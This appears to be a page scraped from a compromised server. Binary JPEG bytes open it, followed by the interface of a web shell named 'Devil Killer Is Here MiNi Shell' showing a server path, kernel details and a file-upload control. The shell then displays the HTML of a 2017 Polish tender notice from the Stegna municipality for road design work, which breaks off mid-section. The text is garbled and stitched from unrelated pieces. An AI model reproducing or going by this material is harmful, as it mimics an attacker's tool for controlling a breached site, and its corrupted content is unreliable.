JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20171017/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20171017/603237-N-2017.html

 <script type="text/javascript">//<![CDATA[//]]></script> <div> <style type="text/css"> .divRow_xforms { float: left; width: 100%; font-weight: normal; line-height: 30px; } .headerLarge_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: larger} .headerMedium_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: medium} .headerSmall_xforms { font-weight: bold; font-size: x-small;} .table_xforms { border-collapse: collapse; width: 900px; font-weight: normal} .table_xforms td { border: 2px solid black; border-collapse: collapse; padding: 5px;} .table_xforms th { border: 2px solid black; border-collapse: collapse; padding: 5px; font-weight: bold} @media print { .no-print, .no-print * { display: none !important; } } </style> <br /> <br /> <span id="ctl00_ContentPlaceHolder1_lblNumerOgloszenia">Ogłoszenie nr 603237-N-2017 z dnia 2017-10-17 r. </span> <br /> <br /> <div class="divRow_xforms"> <div class="headerMedium_xforms" style="text-align: center"> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc_h">Urząd Gminy w Stegnie</span>: <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu_h">,,Opracowanie dokumentacji projektowo - kosztorysowych na: 1. ,,Przebudowa drogi gminnej ul. Dmowskiego w Stegnie wraz z wykonaniem odwodnienia drogi i usunięciem kolizji". 2. ,,Przebudowa drogi ul. Północnej w Stegnie wraz z wykonaniem odwodnienia drogi i usunięciem potencjalnych kolizji". 3. ,,Przebudowa drogi wojewódzkiej nr 501 ul. Gdańskiej w Mikoszewie w zakresie budowy chodnika" 4. ,,Przebudowa drogi gminnej ul. Ogrodowej w Stegnie wraz z wykonaniem odwodnienia drogi i usunięciem kolizji od skrzyżowania z drogą DW 502 ul. Elbląską do skrzyżowania z droga gminną ul. Rycerską". 5. ,,Przebudowa dróg ul. Nowej oraz ul. Wrzosowej w Stegnie wraz z wykonaniem odwodnienia drogi i usunięciem kolizji".</span><br/> OGŁOSZENIE O ZAMÓWIENIU - <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia_h">Usługi</span> </div> <div> <b>Zamieszczanie ogłoszenia:</b> <span id="ctl00_ContentPlaceHolder1_zamieszczanie_obowiazkowe">Zamieszczanie obowiązkowe</span> </div> <div> <b>Ogłoszenie dotyczy:</b> <span id="ctl00_ContentPlaceHolder1_ogloszenie_dotyczy">Zamówienia publicznego</span> </div> <div> <b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_finansowane_z_unii">Nie</span> </div> <br/> <b>Nazwa projektu lub programu</b> <br/> <span id="ctl00_ContentPlaceHolder1_nazwa_projektu_programu"></span> </div> <div> <b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_ubiegac_zaklady_pracy">Nie</span> </div> <br/> Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %) <br/> <span id="ctl00_ContentPlaceHolder1_minimalny_procent_zatrudnienia"></span> </div> <div class="headerLarge_xforms" style="text-align: left"> <u>SEKCJA I: ZAMAWIAJĄCY</u> </div> <div style="padding-left: 20px"> <b>Postępowanie przeprowadza centralny zamawiający </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_centralny_zamawiajacy">Nie</span> </div> <b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_podmiot_zamawiajacy_powierzyl">Nie</span> </div> <b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_powierzyl"></span> <br/> <b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_wspolnie">Nie</span> </div> <br/> Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów: <br/> <br/> <b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_zamawiajacy_z_eu">Nie</span> </div> <b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej - mające zastosowanie krajowe prawo zamówień publicznych:</b> <span id="ctl00_ContentPlaceHolder1_postepowanie_wspolne_tresc"></span> <br/> <b>Informacje dodatkowe:</b> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_zamawiajacy"></span> <br/> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>I. 1) NAZWA I ADRES: </b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_nazwa">Urząd Gminy w Stegnie</span>, krajowy numer identyfikacyjny <span id="ctl00_ContentPlaceHolder1_regon">54264600000</span>, ul. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_ulica">ul. Gdańska</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_domu">34</span> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_mieszkania"></span> , <span id="ctl00_ContentPlaceHolder1_zamawiajacy_kod_pocztowy">82103 </span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc">Stegna</span>, woj. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_wojewodztwo">pomorskie</span>, państwo <span id="ctl00_ContentPlaceHolder1_zamawiajacy_panstwo">Polska</span>, tel. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_telefon">552 478 171</span>, e-mail <span id="ctl00_ContentPlaceHolder1_zamawiajacy_email">stan121@op.pl</span>, faks <span id="ctl00_ContentPlaceHolder1_zamawiajacy_fax">552 478 395</span>. <br/> Adres strony internetowej (URL): <span id="ctl00_ContentPlaceHolder1_adres_strony_url">www.stegna.pl</span> <br/> Adres profilu nabywcy: <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej"></span> <br/> Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej_narzedzia"></span> </div> <div style="text-align: left"> <b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego">Administracja samorządowa</span> <br /> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego_inny"></span> </div> <div style="text-align: left"> <b> I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>: </b> <div style="padding-left: 20px"> Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających): <br/> <span id="ctl00_ContentPlaceHolder1_wspolne_udzielanie_zamowienia"></span> </div> </div> <div style="text-align: left"> <b> I.4) KOMUNIKACJA: </b> <br/> <b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_dokumentow_zamowienia">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_dokumentow_zamowienia"></span> </div> <br/> <b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_zamieszczona_bedzie_specyfikacja">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_zamieszczona_bedzie_specyfikacja">www.bip.stegna.pl - zakładka zamówienia publiczne</span> </div> <br/> <b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_do_dokumentow_ograniczony">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_do_dokumentow_ograniczony"></span> </div> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b> <br/> <b>Elektronicznie</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_oferty_wnioski_dostepne">Nie</span> <br/> adres <br/> <span id="ctl00_ContentPlaceHolder1_oferty_wnioski_dostepne"></span> </div> <br/> <div style="padding-left: 20px"> <b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszczone_wymagane_przeslanie_ofert">Nie</span> <br/> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_inny"></span> <br/> <b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_wymagane_przeslanie_ofert">Tak</span> <br /> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_wymagane_przeslanie_ofert_inny">Operator pocztowy lub kurier </span> <br/> Adres: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_adres">Gmina Stegna, ul. Gdańska 34, 82-103 Stegna </span> </div> <br/> <b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_komunikacja_elektroniczna_wymaga">Nie</span> <br/> Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL) <br/> <span id="ctl00_ContentPlaceHolder1_komunikacja_elektroniczna_wymaga"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA II: PRZEDMIOT ZAMÓWIENIA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu">,,Opracowanie dokumentacji projektowo - kosztorysowych na: 1. ,,Przebudowa drogi gminnej ul. Dmowskiego w Stegnie wraz z wykonaniem odwodnienia drogi i usunięciem kolizji". 2. ,,Przebudowa drogi ul. Północnej w Stegnie wraz z wykonaniem odwodnienia drogi i usunięciem potencjalnych kolizji". 3. ,,Przebudowa drogi wojewódzkiej nr 501 ul. Gdańskiej w Mikoszewie w zakresie budowy chodnika" 4. ,,Przebudowa drogi gminnej ul. Ogrodowej w Stegnie wraz z wykonaniem odwodnienia drogi i usunięciem kolizji od skrzyżowania z drogą DW 502 ul. Elbląską do skrzyżowania z droga gminną ul. Rycerską". 5. ,,Przebudowa dróg ul. Nowej oraz ul. Wrzosowej w Stegnie wraz z wykonaniem odwodnienia drogi i usunięciem kolizji".</span> <br/> <b>Numer referencyjny: </b> <span id="ctl00_ContentPlaceHolder1_numer_referencyjny">RII-INW.272.25.2017</span> <br/> <b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b> <br/> <div style="padding-left: 20px; text-align: justify"> <span id="ctl00_ContentPlaceHolder1_czy_dialog_techniczny">Nie</span> </div> <br/> <b>II.2) Rodzaj zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia">Usługi</span> <br/> <b>II.3) Informacja o możliwości składania ofert częściowych</b> <br/> Zamówienie podzielone jest na części: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_podzielone_na_czesci">Tak</span> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b> <br/> <span id="ctl00_ContentPlaceHolder1_oferty_lub_wnioski">wszystkich części</span> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci"></span> <br/> </div> <b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zastrzega_prawo_grup_czesci"></span> <br/> <b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b> <br/> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci_jednemu_wykonawcy"></span> <br/> <br/> <br/> <b> II.4) Krótki opis przedmiotu zamówienia </b> <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane: </b> <span id="ctl00_ContentPlaceHolder1_okreslenie_przedmiotu">,,Opracowanie dokumentacji projektowo - kosztorysowych na:1. ,,Przebudowa drogi gminnej ul. Dmowskiego w Stegnie wraz z wykonaniem odwodnienia drogi i usunięciem kolizji".2. ,,Przebudowa drogi ul. Północnej w Stegnie wraz z wykonaniem odwodnienia drogi i usunięciem potencjalnych kolizji".3. ,,Przebudowa drogi wojewódzkiej nr 501 ul. Gdańskiej w Mikoszewie w zakresie budowy chodnika"4. ,,Przebudowa drogi gminnej ul. Ogrodowej w Stegnie wraz z wykonaniem odwodnienia drogi i usunięciem kolizji od skrzyżowania z drogą DW 502 ul. Elbląską do skrzyżowania z droga gminną ul. Rycerską". 5. ,,Przebudowa dróg ul. Nowej oraz ul. Wrzosowej w Stegnie wraz z wykonaniem odwodnienia drogi i usunięciem kolizji".</span> <br/> <br/> <b>II.5) Główny kod CPV: </b> <span id="ctl00_ContentPlaceHolder1_cpv_glowny_przedmiot">74232000-4</span> <br/> <b> Dodatkowe kody CPV:</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kod CPV</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>74232200-6</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>74224000-5</TD></TR></TABLE> <br /> <br /> <b> II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>: <br/> Wartość bez VAT: <span id="ctl00_ContentPlaceHolder1_szacunkowa_wartosc_zamowienia_calosc"></span> <br/> Waluta: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_waluta_calosc"></span> <br/> <i>(w przypadku umów ramowych lub dynamicznego systemu zakupów - szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i> </div> <br/> <b> II.7) Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: </b> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67">Nie</span> <br/> Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67_tekst"></span> <br/> <b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b> <br /> miesiącach:&#160; <span id="ctl00_ContentPlaceHolder1_okres_w_miesiacach"></span> &#160;<i> lub </i> <b> dniach:</b> <span id="ctl00_ContentPlaceHolder1_okres_w_dniach"></span> <br /> <i>lub</i> <br /> <b> data rozpoczęcia: </b> <span id="ctl00_ContentPlaceHolder1_data_rozpoczecia"></span> &#160;<i> lub </i><b> zakończenia: </b> <span id="ctl00_ContentPlaceHolder1_data_zakonczenia"></span> <br /> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Okres w miesiącach</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Okres w dniach</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Data rozpoczęcia</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Data zakończenia</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'></TD><TD style='border: 1px solid black;border-collapse: collapse;'></TD><TD style='border: 1px solid black;border-collapse: collapse;'> </TD><TD style='border: 1px solid black;border-collapse: collapse;'>2018-05-30</TD></TR></TABLE> <br/> <b>II.9) Informacje dodatkowe: </b> <span id="ctl00_ContentPlaceHolder1_informacje_na_temat_katalogow"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b> III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU </b> <br/> <div style="padding-left: 20px"> <b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_okreslenie_warunkow"></span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_okreslenie_warunkow"></span> <br/> <b>III.1.2) Sytuacja finansowa lub ekonomiczna </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_okreslenie_warunkow"></span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_informacje_dodatkowe"></span> <br/> <b>III.1.3) Zdolność techniczna lub zawodowa </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_okreslenie_warunkow">1/ Doświadczenie zawodowe:Dotyczy wszystkich części.Warunek Zamawiający uzna za spełniony jeżeli Wykonawca wykaże, iż w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał: co najmniej dwie dokumentacje projektowe dotyczące budowy lub przebudowy (zgodnie z definicjami ustawy Prawo budowlane) drogi o wartości prac projektowych co najmniej 10 000,00 zł brutto każda.2/ Kadra techniczna: Dotyczy wszystkich części.Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, iż na czas realizacji zamówienia będzie dysponował minimum jedną osobą posiadającą odpowiednie uprawnienia do projektowania w specjalności drogowej.</span> <br/> Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób: <span id="ctl00_ContentPlaceHolder1_czy_zdolnosc_techniczna_wymaga_wykonawcow">Tak</span> <br/> Informacje dodatkowe: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_informacje_dodatkowe"></span> </div> <b> III.2) PODSTAWY WYKLUCZENIA </b> <br/> <div style="padding-left: 20px"> <b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1 ustawy Pzp</b> <br/> <b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b> <span id="ctl00_ContentPlaceHolder1_czy_zamawiajacy_przewiduje_wykluczenie">Tak</span> Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia: <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_1">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_2"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_3"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_4"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_5"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_6"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_7"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_8">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 8 ustawy Pzp)</span> <br/> </div> <b> III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI </b> <br/> <div style="padding-left: 20px"> <b> Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_niepodleganiu_wykluczenia">Tak</span> <br/> <b> Oświadczenie o spełnianiu kryteriów selekcji </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_spelnienie_kryteriow">Nie</span> </div> <b> III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP: </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_dokumentow_zaswiadczen"></span> </div> <b> III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_warunkow_udzialu"></span> <br/> <b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_kryteriow_selekcji"></span> </div> <b> III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_potwierdzenie_okolicznosci"></span> </div> <b> III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6) </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_inne_dokumenty_niewymienione"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA IV: PROCEDURA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>IV.1) OPIS </b> <br/> <b>IV.1.1) Tryb udzielenia zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_tryb_udzielenia_zamowienia">Przetarg nieograniczony</span> <br/> <b>IV.1.2) 